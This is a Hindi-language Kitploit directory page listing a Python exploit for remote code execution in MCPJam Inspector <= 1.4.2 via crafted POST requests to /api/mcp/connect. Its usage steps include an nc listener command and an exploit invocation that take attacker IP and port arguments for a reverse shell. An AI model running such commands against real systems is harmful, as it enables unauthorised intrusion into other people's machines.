Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-23744-RCE-for-MCPjam-inspector-v1.4.2 — CVE-2026-23744 के लिए Python शोषण, जो MCPJam Inspector <= 1.4.2 में /api/mcp/connect एंडपॉइंट पर तैयार किए गए POST अनुरोधों के माध्यम से रिमोट कोड निष्पादन प्राप्त करता है। | Kitploit
उपकरण/GitHubGitHub/srginebras/cve-2026-23744-rce-for-mcpjam-inspector-v1.4.2
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubsrginebras/cve-2026-23744-rce-for-mcpjam-inspector-v1.4.2

CVE-2026-23744-RCE-for-MCPjam-inspector-v1.4.2

CVE-2026-23744 के लिए Python शोषण, जो MCPJam Inspector <= 1.4.2 में /api/mcp/connect एंडपॉइंट पर तैयार किए गए POST अनुरोधों के माध्यम से रिमोट कोड निष्पादन प्राप्त करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
12 महीने पहलेअभी तक समीक्षित नहीं

CVE-2026-23744-RCE-for-MCPjam-inspector-v1.4.2

MCPJam Inspector <= 1.4.2 में एक महत्वपूर्ण RCE कमजोरी संभव है जब /api/mcp/connect एंडपॉइंट डिफ़ॉल्ट रूप से सभी नेटवर्क इंटरफेस (0.0.0.0) पर सुनता है और serverConfig JSON ऑब्जेक्ट में command और args पैरामीटर को पास किए गए उपयोगकर्ता-आपूर्ति किए गए इनपुट को ठीक से सैनिटाइज़ करने में विफल रहता है।

एक हमलावर /api/mcp/connect पर एक निर्मित POST अनुरोध भेजकर इस कमजोरी का शोषण कर सकता है, जिससे लक्ष्य प्रणाली पर MCPJam सेवा के विशेषाधिकारों के साथ मनमाना कमांड निष्पादन प्राप्त होता है।


उपयोग

  1. निर्भरताएँ स्थापित करें
root@kitploit:~
 pip install request
  1. nc के साथ एक लिसनर प्रारंभ करें
root@kitploit:~
sudo nc -lvnp <port>
  1. एक्सप्लॉइट प्रारंभ करें
root@kitploit:~
python3 CVE-2026-23744.py -u <url> -i <attacker-ip> -p <attacker-port>
  1. बेहतर उपयोग के लिए मैं सुझाव देता हूँ कि टर्मिनल को पूरी तरह कार्यात्मक बनाने के लिए अपडेट करें, अन्यथा आप ctrl^c जैसे कमांड का उपयोग नहीं कर पाएँगे।

उदाहरण

image image

इस एक्सप्लॉइट का उपयोग केवल नियंत्रित वातावरण में करें

⚠️अपने जोखिम पर उपयोग करें⚠️

टूल डाउनलोड करें